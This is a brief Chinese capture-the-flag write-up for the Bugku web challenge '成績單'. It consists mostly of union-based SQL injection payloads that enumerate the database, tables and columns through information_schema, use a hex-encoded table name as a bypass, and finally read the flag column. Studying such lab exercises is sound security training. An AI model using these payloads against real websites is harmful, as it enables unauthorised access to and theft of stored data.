1. 程式人生 > >Bugku——成績單(web)

Bugku——成績單(web)

可以大概判斷出有四個欄位
直接上payload

-1' union select 1,2,3,database()#


-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x666c3467
#//這裡需要用16進位制繞過 -1' union select 1,2,3,skctf_flag from fl4g#